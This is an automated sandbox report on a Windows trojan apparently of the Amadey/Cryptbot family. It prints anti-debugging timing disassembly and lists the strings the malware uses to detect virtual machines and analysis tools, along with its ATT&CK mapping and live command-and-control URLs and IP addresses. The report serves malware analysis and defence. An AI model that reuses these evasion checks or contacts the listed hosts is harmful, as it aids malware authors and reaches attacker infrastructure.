Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 74207A3 second address: 74207E7 instructions: 0x00000000 rdtsc 0x00000002 mov cx, EB25h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dx, si 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F577C53EFD6h 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 push esi 0x00000018 pushad 0x00000019 popad 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F577C53EFD6h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 74207E7 second address: 74207EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 73C0054 second address: 73C005A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 73C005A second address: 73C005E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 73C005E second address: 73C0070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, 0505A577h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 73C072C second address: 73C0731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 73C0731 second address: 73C0737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 73C0737 second address: 73C073B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 73C073B second address: 73C073F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 73C073F second address: 73C076E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop esi 0x0000000e pushfd 0x0000000f jmp 00007F577C5415CBh 0x00000014 jmp 00007F577C5415D3h 0x00000019 popfd 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C076E second address: 73C0793 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dl 0x00000005 mov edx, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F577C53EFD4h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C0793 second address: 73C0799 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C0799 second address: 73C07AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C53EFCDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C0AD5 second address: 73C0B2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F577C5415D6h 0x00000018 pushfd 0x00000019 jmp 00007F577C5415D2h 0x0000001e xor cl, 00000038h 0x00000021 jmp 00007F577C5415CBh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C0B2F second address: 73C0B76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F577C53EFCEh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F577C53EFD7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C0B76 second address: 73C0BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 80h 0x00000005 pushfd 0x00000006 jmp 00007F577C5415D0h 0x0000000b sbb al, 00000058h 0x0000000e jmp 00007F577C5415CBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C0BA5 second address: 73C0BA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C0BA9 second address: 73C0BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C0BAF second address: 73C0BCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C53EFD9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74109DD second address: 74109E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74109E1 second address: 74109E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74109E7 second address: 7410A3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push ecx 0x0000000c pushfd 0x0000000d jmp 00007F577C5415CDh 0x00000012 sbb cx, B9C6h 0x00000017 jmp 00007F577C5415D1h 0x0000001c popfd 0x0000001d pop eax 0x0000001e push ebx 0x0000001f mov ax, 8313h 0x00000023 pop esi 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov dh, 93h 0x0000002b mov eax, 66085703h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73F003D second address: 73F006B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F577C53EFD1h 0x0000000a sbb si, F546h 0x0000000f jmp 00007F577C53EFD1h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73F006B second address: 73F0118 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push ecx 0x0000000d pushfd 0x0000000e jmp 00007F577C5415D3h 0x00000013 add esi, 5BA4512Eh 0x00000019 jmp 00007F577C5415D9h 0x0000001e popfd 0x0000001f pop ecx 0x00000020 pushfd 0x00000021 jmp 00007F577C5415D1h 0x00000026 sub cl, 00000066h 0x00000029 jmp 00007F577C5415D1h 0x0000002e popfd 0x0000002f popad 0x00000030 and esp, FFFFFFF0h 0x00000033 pushad 0x00000034 movsx ebx, si 0x00000037 popad 0x00000038 sub esp, 44h 0x0000003b jmp 00007F577C5415D2h 0x00000040 xchg eax, ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F577C5415D7h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73F0118 second address: 73F0130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C53EFD4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73F0130 second address: 73F0134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73F0134 second address: 73F01D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F577C53EFCEh 0x0000000e xchg eax, ebx 0x0000000f jmp 00007F577C53EFD0h 0x00000014 xchg eax, esi 0x00000015 pushad 0x00000016 jmp 00007F577C53EFCEh 0x0000001b push esi 0x0000001c pushfd 0x0000001d jmp 00007F577C53EFD1h 0x00000022 add cl, 00000046h 0x00000025 jmp 00007F577C53EFD1h 0x0000002a popfd 0x0000002b pop eax 0x0000002c popad 0x0000002d push eax 0x0000002e pushad 0x0000002f mov eax, 215E71EFh 0x00000034 popad 0x00000035 xchg eax, esi 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 call 00007F577C53EFD7h 0x0000003e pop esi 0x0000003f call 00007F577C53EFD9h 0x00000044 pop ecx 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73F01D5 second address: 73F01DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73F01DB second address: 73F01DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73F01DF second address: 73F0216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F577C5415D0h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 mov ax, C66Dh 0x00000018 call 00007F577C5415CAh 0x0000001d pop eax 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73F0216 second address: 73F021C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Special instruction interceptor: First address: D9F851 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Special instruction interceptor: First address: D9D57A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Special instruction interceptor: First address: F41E6A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: 0_2_00859980 rdtsc 0_2_00859980
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: 0_2_0067255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses, 0_2_0067255D
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: 0_2_006729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle, 0_2_006729FF
Source: E6rBvcWFWu.exe, E6rBvcWFWu.exe, 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: E6rBvcWFWu.exe, 00000000.00000002.1556312719.0000000001AF8000.00000004.00000020.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000003.1515213623.0000000001AD2000.00000004.00000020.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000003.1515339725.0000000001AF7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJz0
Source: E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: E6rBvcWFWu.exe | Binary or memory string: Hyper-V RAW
Source: E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: E6rBvcWFWu.exe, 00000000.00000003.1414694579.0000000001A82000.00000004.00000020.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000003.1415298793.0000000001A85000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
Source: E6rBvcWFWu.exe, 00000000.00000003.1417254786.0000000006CA1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlQ=
Source: E6rBvcWFWu.exe, 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: 0_2_074008F6 Start: 07400ADE End: 07400912 0_2_074008F6
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | File opened: NTICE
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | File opened: SICE
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: 0_2_00859980 rdtsc 0_2_00859980
Source: E6rBvcWFWu.exe, E6rBvcWFWu.exe, 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: >/Program Manager
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: procmon.exe
Source: E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.9:49730 -> 185.121.15.192:80
MITRE ATT&CK matrix, listed per tactic column (a leading number is the count shown next to that technique in the report's matrix):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 2 Command and Scripting Interpreter; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 23 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 751 Security Software Discovery; 23 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Remote System Discovery; 1 File and Directory Discovery; 216 System Information Discovery
Lateral Movement: 1 Exploitation of Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 11 Archive Collected Data; 1 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 4 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label
E6rBvcWFWu.exe | 65% | Virustotal |
E6rBvcWFWu.exe | 71% | ReversingLabs | Win32.Trojan.Amadey
E6rBvcWFWu.exe | 100% | Avira | TR/Crypt.TPM.Gen
E6rBvcWFWu.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850::3 | 100% | Avira URL Cloud | malware
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0 | 100% | Avira URL Cloud | malware
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0U | 100% | Avira URL Cloud | malware
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
home.twentytk20ht.top | 185.121.15.192 | true | false | | high
httpbin.org | 3.218.7.103 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850 | false | | high
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0 | true | Avira URL Cloud: malware | unknown
https://httpbin.org/ip | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://html4/loose.dtd | E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/alt-svc.html# | E6rBvcWFWu.exe | false | | high
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0U | E6rBvcWFWu.exe, 00000000.00000003.1515251616.0000000001A84000.00000004.00000020.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1556041861.0000000001A85000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://httpbin.org/ipbefore | E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/http-cookies.html | E6rBvcWFWu.exe, E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/hsts.html# | E6rBvcWFWu.exe | false | | high
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY | E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: malware | unknown
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850::3 | E6rBvcWFWu.exe, 00000000.00000002.1555959761.0000000001A7A000.00000004.00000020.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000003.1516018473.0000000001A78000.00000004.00000020.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000003.1515970182.0000000001A73000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://curl.se/docs/http-cookies.html# | E6rBvcWFWu.exe | false | | high
https://curl.se/docs/alt-svc.html | E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850 | E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.css | E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.jpg | E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
185.121.15.192 | home.twentytk20ht.top | Spain | 207046 | REDSERVICIOES | false
3.218.7.103 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580905
Start date and time: 2024-12-26 13:01:25 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: E6rBvcWFWu.exe (renamed because the original name is a hash value)
Original Sample Name: b6bf5fb735bf9b5b70a90d2c7eeb2996.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@8/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  No simulations
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.121.15.192gDPzgKHFws.exeGet hashmaliciousCryptbotBrowse
                                  • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                  HFoyAy1tg8.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • fivetk5sb.top/v1/upload.php
                                  8kl5nJ3f9x.exeGet hashmaliciousCryptbotBrowse
                                  • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                  7kf4hLzMoS.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • twentytk20ht.top/v1/upload.php
                                  x6Rd1DzUJA.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • fivetk5sb.top/v1/upload.php
                                  WCeE1A6Xyz.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
                                  SzXZZDlkVE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                  ijn8pyFXSP.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                  WzyLDvldFI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                  PhwUGyok2i.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
Match | Associated Sample Name / URL | Detection | Threat Name | Context
httpbin.org | gDPzgKHFws.exe | malicious | Cryptbot | 34.226.108.155
 | HFoyAy1tg8.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
 | 8kl5nJ3f9x.exe | malicious | Cryptbot | 98.85.100.80
